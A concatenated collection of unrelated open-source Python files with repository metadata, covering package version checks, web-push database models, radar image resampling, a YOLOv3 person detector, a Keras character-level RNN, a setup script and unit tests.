PYTORCH_LIGHTNING_VERSION = None
try:
import tensorflow
TENSORFLOW_VERSION = _minor_version_tuple(tensorflow.__version__)
except ImportError:
logging.getLogger(__name__).info("Tensorflow is not installed.")
TENSORFLOW_VERSION = None
# Serialization version check are needed because they are prone to be inconsistent between versions
CLOUDPICKLE_VERSION = _minor_version_tuple(cloudpickle.__version__)
JSON_TRICKS_VERSION = _minor_version_tuple(json_tricks.__version__)
PYYAML_VERSION = _minor_version_tuple(yaml.__version__)
NNI_VERSION = _minor_version_tuple(nni.__version__)
def version_dump() -> dict[str, tuple[int, int] | None]:
return {
'python': PYTHON_VERSION,
'numpy': NUMPY_VERSION,
'torch': TORCH_VERSION,
'pytorch_lightning': PYTORCH_LIGHTNING_VERSION,
'tensorflow': TENSORFLOW_VERSION,
'cloudpickle': CLOUDPICKLE_VERSION,
'json_tricks': JSON_TRICKS_VERSION,
'pyyaml': PYYAML_VERSION,
'nni': NNI_VERSION
}
def version_check(expect: dict, raise_error: bool = False) -> None:
current_ver = version_dump()
for package in expect:
# version could be list due to serialization
exp_version: tuple | None = tuple(expect[package]) if expect[package] else None
if exp_version is None:
continue
err_message: str | None = None
if package not in current_ver:
err_message = f'{package} is missing in current environment'
elif current_ver[package] != exp_version:
err_message = f'Expect {package} to have version {exp_version}, but {current_ver[package]} found'
if err_message:
if raise_error:
raise RuntimeError('Version check failed: ' + err_message)
else:
warnings.warn('Version check with warning: ' + err_message)
|
app/lib/models/webpush.py
|
didi9575/crackerjack
| 237 |
103158
|
<gh_stars>100-1000
from app import db
class WebPushSubscriptionModel(db.Model):
__tablename__ = 'webpush_subscriptions'
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, default=0, index=True, nullable=True)
endpoint = db.Column(db.String, default='', index=False, nullable=True)
key = db.Column(db.String, default='', index=False, nullable=True)
authsecret = db.Column(db.String, default='', index=False, nullable=True)
finished_at = db.Column(db.DateTime, nullable=True)
class WebPushLogModel(db.Model):
__tablename__ = 'webpush_logs'
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, default=0, index=True, nullable=True)
data = db.Column(db.Text, nullable=True)
sent_at = db.Column(db.DateTime, nullable=True)
|
src/condor_tools/htcondor_cli/verb.py
|
datadvance/htcondor
| 217 |
103169
|
from abc import ABC, abstractmethod
class Verb(ABC):
"""
This docstring is used in the help message when doing
`htcondor noun verb --help`
"""
# The options class dict is a nested dict containing kwargs
# per option for the add_argument method of ArgumentParser,
# see COMMON_OPTIONS in __init__.py for an example.
options = {}
# The __init__ method should take the Verb's options
# and execute whatever it is the user expects to happen.
# The first arg should always be logger.
@abstractmethod
def __init__(self, logger, *args, **kwargs):
raise NotImplementedError
|
dukpy/webassets/jsxfilter.py
|
Dhandarah/dukpy
| 363 |
103230
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function
import os
from webassets.filter import Filter
import dukpy
__all__ = ('BabelJSX', )
class BabelJSX(Filter):
name = 'babeljsx'
max_debug_level = None
options = {
'loader': 'BABEL_MODULES_LOADER'
}
def input(self, _in, out, **kw):
options = {'filename': os.path.basename(kw['source_path'])}
if self.loader == 'systemjs':
options['plugins'] = ['transform-es2015-modules-systemjs']
elif self.loader == 'umd':
options['plugins'] = ['transform-es2015-modules-umd']
src = dukpy.jsx_compile(_in.read(), **options)
out.write(src)
|
code/gen_item_blend_sim.py
|
aister2020/KDDCUP_2020_Debiasing_1st_Place
| 159 |
103235
|
<gh_stars>100-1000
# -*- coding: utf-8 -*-
import numpy as np
from constants import *
import utils
import gc
item_feat = utils.load_pickle(item_feat_pkl)
feat_item_set = set(item_feat.keys())
item_vec1= np.zeros((120000,128),dtype='float32')
item_vec2= np.zeros((120000,128),dtype='float32')
for k,v in item_feat.items():
item_vec1[k] = v[0]
item_vec2[k] = v[1]
split_size = 1000
split_num = int(item_vec1.shape[0]/split_size)
if item_vec1.shape[0]%split_size != 0:
split_num += 1
all_idx = []
all_score = []
l2norm1 = np.linalg.norm(item_vec1,axis=1,keepdims=True)
item_vec1 = item_vec1/(l2norm1+1e-9)
l2norm2 = np.linalg.norm(item_vec2,axis=1,keepdims=True)
item_vec2 = item_vec2/(l2norm2+1e-9)
vec1_vec2 = np.transpose(item_vec1)
vec2_vec2 = np.transpose(item_vec2)
for i in range(split_num):
vec1_vec1 = item_vec1[i*split_size:(i+1)*split_size]
vec2_vec1 = item_vec2[i*split_size:(i+1)*split_size]
text_sim = vec1_vec1.dot(vec1_vec2)
image_sim = vec2_vec1.dot(vec2_vec2)
blend_sim = 0.95*text_sim + 0.05*image_sim
idx = (-blend_sim).argsort(axis=1)
blend_sim = (-blend_sim)
blend_sim.sort(axis=1)
idx = idx[:,:500]
score = blend_sim[:,:500]
score = -score
all_idx.append(idx)
all_score.append(score)
gc.collect()
print('split_num',i)
idx = np.concatenate(all_idx)
score = np.concatenate(all_score)
sim = []
for i in range(idx.shape[0]):
if i in feat_item_set:
sim_i = []
for j,item in enumerate(idx[i]):
if item in feat_item_set:
sim_i.append((item,score[i][j]))
sim.append((i,sim_i))
utils.write_sim(sim,item_blend_sim_path)
|
components/stdproc/stdproc/resamp_slc/Resamp_slc.py
|
vincentschut/isce2
| 1,133 |
103313
|
<gh_stars>1000+
#!/usr/bin/env python3
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Copyright 2010 California Institute of Technology. ALL RIGHTS RESERVED.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# United States Government Sponsorship acknowledged. This software is subject to
# U.S. export control laws and regulations and has been classified as 'EAR99 NLR'
# (No [Export] License Required except when exporting to an embargoed country,
# end user, or in support of a prohibited end use). By downloading this software,
# the user agrees to comply with all applicable U.S. export laws and regulations.
# The user has the responsibility to obtain export licenses, or other export
# authority as may be required before exporting this software to any 'EAR99'
# embargoed foreign country or citizen of those countries.
#
# Author: <NAME>
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
import sys
import os
import math
import numpy as np
import logging
from iscesys.Component.Component import Component,Port
from stdproc.stdproc.resamp_slc import resamp_slc
from isceobj.Util import combinedlibmodule as CL
import isceobj
from iscesys.ImageUtil.ImageUtil import ImageUtil as IU
from isceobj.Util import Poly2D
class Resamp_slc(Component):
interpolationMethods = { 'SINC' : 0,
'BILINEAR' : 1,
'BICUBIC' : 2,
'NEAREST' : 3,
'AKIMA' : 4,
'BIQUINTIC': 5}
def resamp_slc(self, imageIn=None, imageOut=None):
for port in self.inputPorts:
port()
if imageIn is not None:
self.imageIn = imageIn
if self.imageIn is None:
self.logger.error("Input slc image not set.")
raise Exception
if imageOut is not None:
self.imageOut = imageOut
if self.imageOut is None:
self.logger.error("Output slc image not set.")
raise Exception
self.setDefaults()
self.createImages()
self.setState()
resamp_slc.setRangeCarrier_Py(self.rangeCarrierAccessor)
resamp_slc.setAzimuthCarrier_Py(self.azimuthCarrierAccessor)
resamp_slc.setRangeOffsetsPoly_Py(self.rangeOffsetsAccessor)
resamp_slc.setAzimuthOffsetsPoly_Py(self.azimuthOffsetsAccessor)
resamp_slc.setDopplerPoly_Py(self.dopplerAccessor)
resamp_slc.resamp_slc_Py(self.imageInAccessor,self.imageOutAccessor,self.residualAzimuthAccessor, self.residualRangeAccessor)
self.destroyImages()
return
def createImages(self):
if self.imageIn._accessor is None:
self.imageIn.createImage()
self.imageInAccessor = self.imageIn.getImagePointer()
if self.imageOut._accessor is None:
self.imageOut.createImage()
self.imageOutAccessor = self.imageOut.getImagePointer()
if self.rangeCarrierPoly is not None:
self.rangeCarrierAccessor = self.rangeCarrierPoly.exportToC()
else:
print('No Range Carrier provided.')
print('Assuming zero range carrier.')
poly = Poly2D.Poly2D()
poly.initPoly(rangeOrder=0, azimuthOrder=0, coeffs=[[0.]])
self.rangeCarrierAccessor = poly.exportToC()
if self.azimuthCarrierPoly is not None:
self.azimuthCarrierAccessor = self.azimuthCarrierPoly.exportToC()
else:
poly = Poly2D.Poly2D()
poly.initPoly(rangeOrder=0, azimuthOrder=0, coeffs=[[0.]])
self.azimuthCarrierAccessor = poly.exportToC()
print('No Azimuth Carrier provided.')
print('Assuming zero azimuth carrier.')
if self.rangeOffsetsPoly is not None:
self.rangeOffsetsAccessor = self.rangeOffsetsPoly.exportToC()
else:
print('No range offset polynomial provided')
poly = Poly2D.Poly2D()
poly.initPoly(rangeOrder=0, azimuthOrder=0, coeffs=[[0.]])
self.rangeOffsetsAccessor = poly.exportToC()
if self.azimuthOffsetsPoly is not None:
self.azimuthOffsetsAccessor = self.azimuthOffsetsPoly.exportToC()
else:
print('No azimuth offset polynomial provided')
poly = Poly2D.Poly2D()
poly.initPoly(rangeOrder=0, azimuthOrder=0, coeffs = [[0.]])
self.azimuthOffsetsAccessor = poly.exportToC()
if self.residualRangeImage is not None:
if self.residualRangeImage._accessor is None:
self.residualRangeImage.setCaster('read', 'DOUBLE')
self.residualRangeImage.createImage()
self.residualRangeAccessor = self.residualRangeImage.getImagePointer()
else:
self.residualRangeAccessor = 0
if self.residualAzimuthImage is not None:
if self.residualAzimuthImage._accessor is None:
self.residualAzimuthImage.setCaster('read', 'DOUBLE')
self.residualAzimuthImage.createImage()
self.residualAzimuthAccessor = self.residualAzimuthImage.getImagePointer()
else:
self.residualAzimuthAccessor = 0
if self.dopplerPoly is not None:
self.dopplerAccessor = self.dopplerPoly.exportToC()
else:
print('No doppler polynomial provided')
print('Assuming zero doppler centroid')
poly = Poly2D.Poly2D()
poly.initPoly(rangeOrder=0, azimuthOrder=0, coeffs=[[0.]])
self.dopplerAccessor = poly.exportToC()
def destroyImages(self):
CL.freeCPoly2D(self.rangeCarrierAccessor)
CL.freeCPoly2D(self.azimuthCarrierAccessor)
CL.freeCPoly2D(self.rangeOffsetsAccessor)
CL.freeCPoly2D(self.azimuthOffsetsAccessor)
CL.freeCPoly2D(self.dopplerAccessor)
if self.residualRangeImage is not None:
self.residualRangeImage.finalizeImage()
if self.residualAzimuthImage is not None:
self.residualAzimuthImage.finalizeImage()
self.imageIn.finalizeImage()
self.imageOut.finalizeImage()
return
def setDefaults(self):
if self.inputLines is None:
self.inputLines = self.imageIn.getLength()
self.logger.warning('The variable INPUT_LINES has been set to the default value %d which is the number of lines in the slc image.' % (self.inputLines))
if self.inputWidth is None:
self.inputWidth = self.imageIn.getWidth()
self.logger.warning('The variable INPUT_WIDTH has been set to the default value %d which is the width of the slc image.' % (self.inputWidth))
if self.inputWidth != self.imageIn.getWidth():
raise Exception('Width of input image {0} does not match specified width {1}'.format(self.imageIn.getWidth(), self.inputWidth))
if self.startingRange is None:
self.startingRange = 0.0
if self.referenceStartingRange is None:
self.referenceStartingRange = self.startingRange
if self.referenceSlantRangePixelSpacing is None:
self.referenceSlantRangePixelSpacing = self.slantRangePixelSpacing
if self.referenceWavelength is None:
self.referenceWavelength = self.radarWavelength
if self.outputLines is None:
self.outputLines = self.imageOut.getLength()
self.logger.warning('The variable OUTPUT_LINES has been set to the default value %d which is the number of lines in the slc image.'%(self.outputLines))
if self.outputWidth is None:
self.outputWidth = self.imageOut.getWidth()
self.logger.warning('The variable OUTPUT_WIDTH has been set to the default value %d which is the width of the slc image.'%(self.outputWidth))
if (self.outputWidth != self.imageOut.getWidth()):
raise Exception('Width of output image {0} does not match specified width {1}'.format(self.imageOut.getWidth(), self.outputWidth))
if self.imageIn.dataType.upper().startswith('C'):
self.isComplex = True
else:
self.isComplex = False
if self.imageIn.getBands() > 1:
raise Exception('The code currently is setup to resample single band images only')
if self.method is None:
if self.isComplex:
self.method = 'SINC'
else:
self.method = 'BILINEAR'
if self.flatten is None:
self.logger.warning('No flattening requested')
self.flatten = False
return
def setState(self):
resamp_slc.setInputWidth_Py(int(self.inputWidth))
resamp_slc.setInputLines_Py(int(self.inputLines))
resamp_slc.setOutputWidth_Py(int(self.outputWidth))
resamp_slc.setOutputLines_Py(int(self.outputLines))
resamp_slc.setRadarWavelength_Py(float(self.radarWavelength))
resamp_slc.setSlantRangePixelSpacing_Py(float(self.slantRangePixelSpacing))
###Introduced for dealing with data with different range sampling frequencies
resamp_slc.setReferenceWavelength_Py(float(self.referenceWavelength))
resamp_slc.setStartingRange_Py(float(self.startingRange))
resamp_slc.setReferenceStartingRange_Py(float(self.referenceStartingRange))
resamp_slc.setReferenceSlantRangePixelSpacing_Py(float(self.referenceSlantRangePixelSpacing))
intpKey = self.interpolationMethods[self.method.upper()]
resamp_slc.setMethod_Py(int(intpKey))
resamp_slc.setIsComplex_Py(int(self.isComplex))
resamp_slc.setFlatten_Py(int(self.flatten))
return
def setInputWidth(self,var):
self.inputWidth = int(var)
return
def setInputLines(self, var):
self.inputLines = int(var)
return
def setOutputWidth(self, var):
self.outputWidth = int(var)
return
def setOutputLines(self,var):
self.outputLines = int(var)
return
def setRadarWavelength(self,var):
self.radarWavelength = float(var)
return
def setSlantRangePixelSpacing(self,var):
self.slantRangePixelSpacing = float(var)
return
def __getstate__(self):
d = dict(self.__dict__)
del d['logger']
return d
def __setstate__(self,d):
self.__dict__.update(d)
self.logger = logging.getLogger('isce.stdproc.resamp_slc')
return
def addOffsets(self):
from isceobj.Util.Poly2D import Poly2D
offsets = self._inputPorts['offsets']
if offsets:
polys = offsets.getFitPolynomials()
self.azimuthOffsetsPoly = polys[0]
self.rangeOffsetsPoly = polys[1]
def addSlc(self):
from isceobj.Util import Poly2D
from isceobj.Constants import SPEED_OF_LIGHT
formslc = self._inputPorts['slc']
if (formslc):
####Set up azimuth carrier information
coeffs = []
coeffs.append([2*np.pi*val for val in formslc.dopplerCentroidCoefficients])
self.dopplerPoly = Poly2D.Poly2D()
self.dopplerPoly.initPoly(rangeOrder=len(formslc.dopplerCentroidCoefficients)-1, azimuthOrder=0, coeffs=coeffs)
######Setup range carrier information
delr = 0.5*SPEED_OF_LIGHT / formslc.rangeSamplingRate
self.slantRangePixelSpacing = delr
self.radarWavelength = formslc.radarWavelength
# coeffs = [[0.0, -4 * np.pi * delr/self.radarWavelength]]
# self.rangeCarrierPoly = Poly2D.Poly2D()
# self.rangeCarrierPoly.initPoly(rangeOrder=1, azimuthOrder=0, coeffs=coeffs)
img = isceobj.createImage()
IU.copyAttributes(formslc.slcImage, img)
img.setAccessMode('read')
self.imageIn = img
def addReferenceImage(self):
refImg = self._inputPorts['reference']
if (refImg):
self.outputWidth = refImg.getWidth()
self.outputLines = refImg.getLength()
def __init__(self):
Component.__init__(self)
self.inputWidth = None
self.inputLines = None
self.outputWidth = None
self.outputLines = None
self.radarWavelength = None
self.slantRangePixelSpacing = None
self.azimuthOffsetsPoly = None
self.azimuthOffsetsAccessor = None
self.rangeOffsetsPoly = None
self.rangeOffsetsAccessor = None
self.rangeCarrierPoly = None
self.rangeCarrierAccessor = None
self.azimuthCarrierPoly = None
self.azimuthCarrierAccessor = None
self.residualRangeImage = None
self.residualAzimuthImage = None
self.residualRangeAccessor = None
self.residualAzimuthAccessor = None
self.dopplerPoly = None
self.dopplerAccessor = None
self.isComplex = None
self.method = None
self.flatten = None
self.startingRange = None
self.referenceWavelength = None
self.referenceStartingRange = None
self.referenceSlantRangePixelSpacing = None
self.logger = logging.getLogger('isce.stdproc.resamp_slc')
offsetPort = Port(name='offsets', method=self.addOffsets)
slcPort = Port(name='slc', method=self.addSlc)
referencePort = Port(name='reference', method=self.addReferenceImage)
self._inputPorts.add(offsetPort)
self._inputPorts.add(slcPort)
self._inputPorts.add(referencePort)
self.dictionaryOfVariables = { \
'INPUT_WIDTH' : ['self.inputWidth', 'int','mandatory'], \
'INPUT_LINES' : ['self.inputLines', 'int','optional'], \
'OUTPUT_LINES' : ['self.outputLines', 'int', 'optional'], \
'OUTPUT_WIDTH' : ['self.outputWidth', 'int', 'optional'], \
'RADAR_WAVELENGTH' : ['self.radarWavelength', 'float','mandatory'], \
'SLANT_RANGE_PIXEL_SPACING' : ['self.slantRangePixelSpacing', 'float','mandatory'], \
}
self.dictionaryOfOutputVariables = { }
return
#end class
if __name__ == "__main__":
sys.exit(main())
|
universal_computation/datasets/listops.py
|
jasonjewik/universal-computation
| 183 |
103343
|
<filename>universal_computation/datasets/listops.py
import tensorflow_datasets
import torch
from universal_computation.datasets.dataset import Dataset
from universal_computation.datasets.helpers.listops import get_datasets
class ListopsDataset(Dataset):
def __init__(self, batch_size, *args, **kwargs):
super().__init__(*args, **kwargs)
self.batch_size = batch_size # we fix it so we can use dataloader
self.d_train, self.d_test, *_ = get_datasets(1, 'basic', batch_size=batch_size, data_dir='data/listops/')
self.train_enum = iter(tensorflow_datasets.as_numpy(self.d_train))
self.test_enum = iter(tensorflow_datasets.as_numpy(self.d_test))
def reset_test(self):
self.test_enum = enumerate(self.d_test)
def get_batch(self, batch_size=None, train=True):
if train:
batch = next(self.train_enum, None)
if batch is None:
self.train_enum = iter(tensorflow_datasets.as_numpy(self.d_train))
batch = next(self.train_enum)
else:
batch = next(self.test_enum, None)
if batch is None:
self.test_enum = iter(tensorflow_datasets.as_numpy(self.d_test))
batch = next(self.test_enum)
x, y = batch['inputs'], batch['targets']
x = torch.from_numpy(x).long()
y = torch.from_numpy(y).long()
x = x.to(device=self.device)
y = y.to(device=self.device)
self._ind += 1
return x, y
|
simulation/decai/simulation/data/featuremapping/tests/test_feature_index_mapper.py
|
boost-entropy-python/0xDeCA10B
| 445 |
103385
|
import unittest
import numpy as np
import scipy.sparse
from injector import Injector
from decai.simulation.data.featuremapping.feature_index_mapper import FeatureIndexMapper
from decai.simulation.logging_module import LoggingModule
class TestFeatureIndexMapper(unittest.TestCase):
@classmethod
def setUpClass(cls):
inj = Injector([
LoggingModule,
])
cls.f = inj.get(FeatureIndexMapper)
def test_map_dense(self):
x_train = np.random.random_sample((10, 3))
x_test = np.random.random_sample((4, x_train.shape[1]))
train, test, feature_index_mapping = self.f.map(x_train, x_test)
self.assertIs(train, x_train)
self.assertIs(test, x_test)
self.assertIsNone(feature_index_mapping)
def test_map_sparse(self):
x_train = np.array([[0, 0, 1, 1, 0], [0, 2, 0, 0, 0]])
x_test = np.array([[1, 0, 1, 0, 1], [0, 0, 3, 0, 0]])
x_train_sparse = scipy.sparse.csr_matrix((17348, 4288315073), dtype=np.uint8)
x_train_sparse[x_train.nonzero()] = x_train[x_train.nonzero()]
x_test_sparse = scipy.sparse.csr_matrix((3333, 21312344), dtype=np.uint8)
x_test_sparse[x_test.nonzero()] = x_test[x_test.nonzero()]
mapped_train, mapped_test, feature_index_mapping = self.f.map(x_train_sparse, x_test_sparse)
self.assertEqual(int, type(feature_index_mapping[0]))
self.assertEqual([1, 2, 3], feature_index_mapping)
self.assertTrue(mapped_train.sum(axis=0).all(),
"Every column should have at least one non-zero value.")
x_train_expected = np.zeros((x_train_sparse.shape[0], len(feature_index_mapping)), dtype=np.uint8)
x_train_expected[0, 1] = 1
x_train_expected[0, 2] = 1
x_train_expected[1, 0] = 2
self.assertTrue(np.array_equal(x_train_expected, mapped_train), mapped_train)
x_test_expected = np.zeros((x_test_sparse.shape[0], len(feature_index_mapping)), dtype=np.uint8)
x_test_expected[0, 1] = 1
x_test_expected[1, 1] = 3
self.assertTrue(np.array_equal(x_test_expected, mapped_test), mapped_test)
|
pyNastran/dev/bdf_vectorized/test/all_tests.py
|
ACea15/pyNastran
| 293 |
103387
|
from pyNastran.dev.bdf_vectorized.test.test_coords import *
from pyNastran.dev.bdf_vectorized.test.test_mass import *
from pyNastran.dev.bdf_vectorized.cards.elements.solid.test_solids import *
from pyNastran.dev.bdf_vectorized.cards.elements.shell.test_shell import *
from pyNastran.dev.bdf_vectorized.cards.elements.rod.test_rods import *
#from pyNastran.dev.bdf_vectorized.cards.elements.bar.test_bars import *
#from pyNastran.dev.bdf_vectorized.cards.elements.beam.test_beams import *
#from pyNastran.dev.bdf_vectorized.cards.elements.spring.test_spring import *
#from pyNastran.dev.bdf_vectorized.cards.elements.shear.test_shear import *
#from pyNastran.dev.bdf_vectorized.cards.elements.damper.test_dampers import *
if __name__ == "__main__": # pragma: no cover
import unittest
unittest.main()
|
tests/bytecode/mp-tests/fun2.py
|
LabAixBidouille/micropython
| 303 |
103404
|
def f(*, b):
return b
def f(a, *, b):
return a + b
def f(a, *, b, c):
return a + b + c
def f(a, *, b=c):
return a + b
def f(a, *, b=c, c):
return a + b + c
def f(a, *, b=c, c=d):
return a + b + c
def f(a, *, b=c, c, d=e):
return a + b + c + d
def f(a=None, *, b=None):
return a + b
|
Chapter06/alice_chargen_rnn.py
|
Diponly/Deep-Learning-with-Keras
| 1,119 |
103412
|
# -*- coding: utf-8 -*-
# Adapted from lstm_text_generation.py in keras/examples
from __future__ import print_function
from keras.layers.recurrent import SimpleRNN
from keras.models import Sequential
from keras.layers import Dense, Activation
import numpy as np
INPUT_FILE = "../data/alice_in_wonderland.txt"
# extract the input as a stream of characters
print("Extracting text from input...")
fin = open(INPUT_FILE, 'rb')
lines = []
for line in fin:
line = line.strip().lower()
line = line.decode("ascii", "ignore")
if len(line) == 0:
continue
lines.append(line)
fin.close()
text = " ".join(lines)
# creating lookup tables
# Here chars is the number of features in our character "vocabulary"
chars = set([c for c in text])
nb_chars = len(chars)
char2index = dict((c, i) for i, c in enumerate(chars))
index2char = dict((i, c) for i, c in enumerate(chars))
# create inputs and labels from the text. We do this by stepping
# through the text ${step} character at a time, and extracting a
# sequence of size ${seqlen} and the next output char. For example,
# assuming an input text "The sky was falling", we would get the
# following sequence of input_chars and label_chars (first 5 only)
# The sky wa -> s
# he sky was ->
# e sky was -> f
# sky was f -> a
# sky was fa -> l
print("Creating input and label text...")
SEQLEN = 10
STEP = 1
input_chars = []
label_chars = []
for i in range(0, len(text) - SEQLEN, STEP):
input_chars.append(text[i:i + SEQLEN])
label_chars.append(text[i + SEQLEN])
# vectorize the input and label chars
# Each row of the input is represented by seqlen characters, each
# represented as a 1-hot encoding of size len(char). There are
# len(input_chars) such rows, so shape(X) is (len(input_chars),
# seqlen, nb_chars).
# Each row of output is a single character, also represented as a
# dense encoding of size len(char). Hence shape(y) is (len(input_chars),
# nb_chars).
print("Vectorizing input and label text...")
X = np.zeros((len(input_chars), SEQLEN, nb_chars), dtype=np.bool)
y = np.zeros((len(input_chars), nb_chars), dtype=np.bool)
for i, input_char in enumerate(input_chars):
for j, ch in enumerate(input_char):
X[i, j, char2index[ch]] = 1
y[i, char2index[label_chars[i]]] = 1
# Build the model. We use a single RNN with a fully connected layer
# to compute the most likely predicted output char
HIDDEN_SIZE = 128
BATCH_SIZE = 128
NUM_ITERATIONS = 25
NUM_EPOCHS_PER_ITERATION = 1
NUM_PREDS_PER_EPOCH = 100
model = Sequential()
model.add(SimpleRNN(HIDDEN_SIZE, return_sequences=False,
input_shape=(SEQLEN, nb_chars),
unroll=True))
model.add(Dense(nb_chars))
model.add(Activation("softmax"))
model.compile(loss="categorical_crossentropy", optimizer="rmsprop")
# We train the model in batches and test output generated at each step
for iteration in range(NUM_ITERATIONS):
print("=" * 50)
print("Iteration #: %d" % (iteration))
model.fit(X, y, batch_size=BATCH_SIZE, epochs=NUM_EPOCHS_PER_ITERATION)
# testing model
# randomly choose a row from input_chars, then use it to
# generate text from model for next 100 chars
test_idx = np.random.randint(len(input_chars))
test_chars = input_chars[test_idx]
print("Generating from seed: %s" % (test_chars))
print(test_chars, end="")
for i in range(NUM_PREDS_PER_EPOCH):
Xtest = np.zeros((1, SEQLEN, nb_chars))
for i, ch in enumerate(test_chars):
Xtest[0, i, char2index[ch]] = 1
pred = model.predict(Xtest, verbose=0)[0]
ypred = index2char[np.argmax(pred)]
print(ypred, end="")
# move forward with test_chars + ypred
test_chars = test_chars[1:] + ypred
print()
|
setup.py
|
adafruit/adafruit-beaglebone-io-python
| 305 |
103450
|
<gh_stars>100-1000
try:
from overlays import builder
builder.compile()
builder.copy()
except:
pass
import distribute_setup
import io
import sys
import platform
distribute_setup.use_setuptools()
from setuptools import setup, Extension, find_packages
open_as_utf8 = lambda x: io.open(x, encoding='utf-8')
kernel = platform.release()
if kernel >= '4.1.0':
kernel41 = [('BBBVERSION41', None)]
else:
kernel41 = None
CFLAGS = ['-Wall']
classifiers = ['Development Status :: 3 - Alpha',
'Operating System :: POSIX :: Linux',
'License :: OSI Approved :: MIT License',
'Intended Audience :: Developers',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Topic :: Software Development',
'Topic :: Home Automation',
'Topic :: System :: Hardware']
extension_args = {
'include_dirs': ['source/include/'],
'extra_compile_args': CFLAGS,
'define_macros': kernel41
}
setup(name = 'Adafruit_BBIO',
version = '1.2.0',
author = '<NAME>',
author_email = '<EMAIL>',
description = 'A module to control BeagleBone IO channels',
long_description = open_as_utf8('README.md').read() + open_as_utf8('CHANGELOG.md').read(),
long_description_content_type = 'text/markdown',
license = 'MIT',
keywords = 'Adafruit BeagleBone IO GPIO PWM ADC',
url = 'https://github.com/adafruit/adafruit-beaglebone-io-python/',
classifiers = classifiers,
packages = find_packages(),
py_modules = ['Adafruit_I2C'],
ext_modules = [Extension('Adafruit_BBIO.GPIO', ['source/py_gpio.c', 'source/event_gpio.c', 'source/c_pinmux.c', 'source/constants.c', 'source/common.c'], **extension_args),
Extension('Adafruit_BBIO.PWM', ['source/py_pwm.c', 'source/c_pwm.c', 'source/c_pinmux.c', 'source/constants.c', 'source/common.c'], **extension_args),
Extension('Adafruit_BBIO.ADC', ['source/py_adc.c', 'source/c_adc.c', 'source/constants.c', 'source/common.c'], **extension_args),
Extension('Adafruit_BBIO.SPI', ['source/spimodule.c', 'source/c_pinmux.c', 'source/constants.c', 'source/common.c'], **extension_args),
Extension('Adafruit_BBIO.UART', ['source/py_uart.c', 'source/c_pinmux.c', 'source/c_uart.c', 'source/constants.c', 'source/common.c'], **extension_args)] )
|
thirdparty/his_evaluators/his_evaluators/metrics/yolov3/human_detector.py
|
eyaler/impersonator
| 1,717 |
103467
|
import torch
import torch.nn as nn
import os
from .models import Darknet
from .utils.utils import non_max_suppression, rescale_boxes
class YoLov3HumanDetector(nn.Module):
def __init__(self, weights_path="weights/yolov3.weights",
conf_thres=0.8, nms_thres=0.4, img_size=416, device=torch.device("cpu")):
super().__init__()
self.conf_thres = conf_thres
self.nms_thres = nms_thres
self.img_size = img_size
# Set up model
model_def = os.path.abspath(os.path.dirname(__file__))
# model_def = os.path.join(model_def, "config", "yolov3.cfg")
model_def = os.path.join(model_def, "config", "yolov3-spp.cfg")
model = Darknet(model_def, img_size=img_size).to(device)
if weights_path.endswith(".weights"):
# Load darknet weights
model.load_darknet_weights(weights_path)
else:
# Load checkpoint weights
model.load_state_dict(torch.load(weights_path))
model.eval()
self.device = device
self.model = model.to(device)
def forward(self, input_imgs, input_shapes, factor=1.05):
"""
Run YOLOv3 on input_imgs and return the largest bounding boxes of the person in input_imgs.
Args:
input_imgs (torch.tensor): (bs, 3, height, width) is in the range of [0, 1],
input_shapes (list[tuple]): [(height, width), (height, width), ...],
factor (float): the factor to enlarge the original boxes, e.g [x0, y0, x1, y1] -> [xx0, yy0, xx1, yy1],
here (xx1 - xx0) / (x1 - x0) = factor and (yy1 - yy0) / (y1 - y0) = factor.
Returns:
boxes_list (list[tuple or None]): (x1, y1, x2, y2) or None
"""
# Get detections
with torch.no_grad():
# img, _ = pad_to_square(input_imgs, 0)
# Resize
img_detections = self.model(input_imgs)
img_detections = non_max_suppression(img_detections, self.conf_thres, self.nms_thres)
bs = len(img_detections)
boxes_list = [None for _ in range(bs)]
# Draw bounding boxes and labels of detections
for i, (detections, img_shape) in enumerate(zip(img_detections, input_shapes)):
if detections is not None:
# Rescale boxes to original image
detections = rescale_boxes(detections, self.img_size, img_shape)
max_area = 0
boxes = None
for x1, y1, x2, y2, conf, cls_conf, cls_pred in detections:
# if is `person`
if int(cls_pred) != 0:
continue
box_w = x2 - x1
box_h = y2 - y1
area = box_h * box_w
if area > max_area:
max_area = area
boxes = (x1, y1, x2, y2)
if boxes is not None:
boxes_list[i] = self.enlarge_boxes(boxes, img_shape, factor=factor)
return boxes_list
@staticmethod
def enlarge_boxes(boxes, orig_shape, factor=1.0):
"""
Args:
boxes (list or tuple): (x0, y0, x1, y1),
orig_shape (tuple or list): (height, width),
factor (float): the factor to enlarge the original boxes, e.g [x0, y0, x1, y1] -> [xx0, yy0, xx1, yy1],
here (xx1 - xx0) / (x1 - x0) = factor and (yy1 - yy0) / (y1 - y0) = factor.
Returns:
new_boxes (list of tuple): (xx0, yy0, xx1, yy1),
here (xx1 - xx0) / (x1 - x0) = factor and (yy1 - yy0) / (y1 - y0) = factor.
"""
height, width = orig_shape
x0, y0, x1, y1 = boxes
w = x1 - x0
h = y1 - y0
cx = (x1 + x0) / 2
cy = (y1 + y0) / 2
half_new_w = w * factor / 2
half_new_h = h * factor / 2
xx0 = int(max(0, cx - half_new_w))
yy0 = int(max(0, cy - half_new_h))
xx1 = int(min(width, cx + half_new_w))
yy1 = int(min(height, cy + half_new_h))
new_boxes = (xx0, yy0, xx1, yy1)
return new_boxes
|
python/django/python-hello-world/src/helloapp/views.py
|
davidponder/cloud-code-samples
| 319 |
103514
|
<gh_stars>100-1000
from django.shortcuts import render
import os
def homePageView(request):
return render(request, 'homepage.html', context={
"message": "It's running!"
})
|
dash_docs/chapters/dash_vtk/click_hover/index.py
